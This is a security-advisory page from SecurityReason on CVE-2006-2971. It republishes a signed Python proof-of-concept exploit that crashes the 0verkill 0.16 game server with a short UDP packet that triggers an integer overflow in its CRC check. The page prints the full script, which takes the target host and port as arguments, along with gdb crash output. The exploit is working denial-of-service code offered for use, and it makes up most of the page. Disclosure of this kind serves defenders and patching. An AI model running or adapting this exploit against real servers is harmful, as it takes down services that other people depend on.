|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1090 CVE : CVE-2006-2971 SecurityRisk : High  (About) Remote Exploit : No Local Exploit : Yes Exploit Available : Yes Credit : Federico Fazzi (federico autistici org) Published : 15.06.2006
Advisory Content : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 #!/usr/bin/env python # # ----------------------------------------------------- # Exploit id: FSE:016 # # Author: Federico Fazzi # Contact: federico (at) autistici (dot) org [email concealed] # Date: 09/06/2006, 13:58 # Sinthesis: 0verkill 0.16, Remote integer overflow # Product: http://artax.karlin.mff.cuni.cz/~brain/0verkill/ # ----------------------------------------------------- # # Start with: # python f_0k-0.1.py <remote_addr> <remote_port> # # Proof of concept: # (gdb) run # Starting program: /home/federico/0verkill-0.16/server # 9. 6.2006 14:18:07 Running 0verkill server version 0.16 # 9. 6.2006 14:18:07 Initialization. # 9. 6.2006 14:18:07 Loading sprites. # 9. 6.2006 14:18:07 Loading level "level1".... # 9. 6.2006 14:18:07 Loading level graphics. # 9. 6.2006 14:18:08 Loading level map. # 9. 6.2006 14:18:08 Loading level objects. # 9. 6.2006 14:18:08 Initializing socket. # 9. 6.2006 14:18:08 Installing signal handlers. # 9. 6.2006 14:18:08 Game started. # 9. 6.2006 14:18:08 Sleep # 9. 6.2006 14:18:10 Wakeup # # (run python f_0k-0.6.py) # # Program received signal SIGSEGV, Segmentation fault. # crc32 (buf=0x837a000 <Address 0x837a000 out of bounds>, len=4294967288) at crc32.c:82 # warning: Source file is more recent than executable. # 82 DO8(buf); # # #0 0x0805b54a in recv_packet (packet=0x805fd20 "", # max_len=256, addr=0xf18df475, addr_len=0xf18df475, sender_server=0, recipient=0, # sender=0xbfcf6d54) at net.c:94 # 94 if (crc!=crc32(packet,retval-12))return -1; # # limits byte receive is 12, if you send an inferior number of it # the game crash. import os, sys from socket import * usage = "run: python %s [remote_addr] [remote_port] " % os.path.basename(sys.argv[0]) if len(sys.argv) < 3: print usage sys.exit() host = sys.argv[1] port = int(sys.argv[2]) sock = socket(AF_INET, SOCK_DGRAM) sock.connect((host, port)) print "connecting.. ", if sock > 0: print "done!" else: print "wrong!" print "crashing the server.. ", if sock.sendto('0x00' , (host, port)): print "done!" else: print "wrong!" print "wait five seconds, if no data found press CTRL+C" try: reply = sock.recvfrom(512) print reply except: print "no data receive!" sys.exit() -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEiXFc/yZYyBsK/94RAuQGAJ4lf2yqd3s7iXX6cbcRKPh3Yn89sgCgrDXv Kjh+GPu1bIFMp7wKVP8rSoU= =BAam -----END PGP SIGNATURE-----  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |